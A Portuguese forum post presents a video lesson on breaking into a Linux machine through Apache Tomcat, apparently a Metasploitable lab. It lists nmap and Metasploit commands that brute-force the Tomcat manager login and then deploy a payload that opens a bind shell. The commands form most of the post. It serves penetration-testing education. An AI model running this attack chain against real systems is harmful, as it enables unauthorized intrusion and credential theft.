[Video] Invasão em micro Linux

[Bhior]

Nessa aula mostro como explorar um serviço rodando em um micro Linux. O serviço era do apache tomcat. Para maiores informações do mesmo Apache Tomcat - Wikipédia, a enciclopédia livre

O que eu fiz?
Escanei o host com o Nmap,
verifiquei os serviço,
fiz um scanner com o metasploit para verifica vulnerabilidade do login, peguei o login e senha e injetei o exploit.

Comandos:

nmap -sV host
use scanner/http/tomcat_mgr_login
set rhost Ip_da_vitima
set rport 8180
exploit

use multi/http/tomcat_mgr_deploy
set rhost Ip_da_vitima
set username Login_capturado
set passwoer Senha_capturada
set rport 8180
set payload linux/x86/shell_bind_tcp
exploit

Programas usados:
Metasploit -> Metasploit Penetration Testing Framework
Nmap -> Download the Free Nmap Security Scanner for Linux/MAC/UNIX or Windows

Manual do nmap em português

Guia de Referência do Nmap (Página do Manual)

Baixar:

Explorando_vulnerabilidade_linux.rar - 4shared.com - online file sharing and storage - download

Assisti on-line:

Invadindo um micro Linux

[espreto]

Ou seja!

Metasploit: Introducing Metasploitable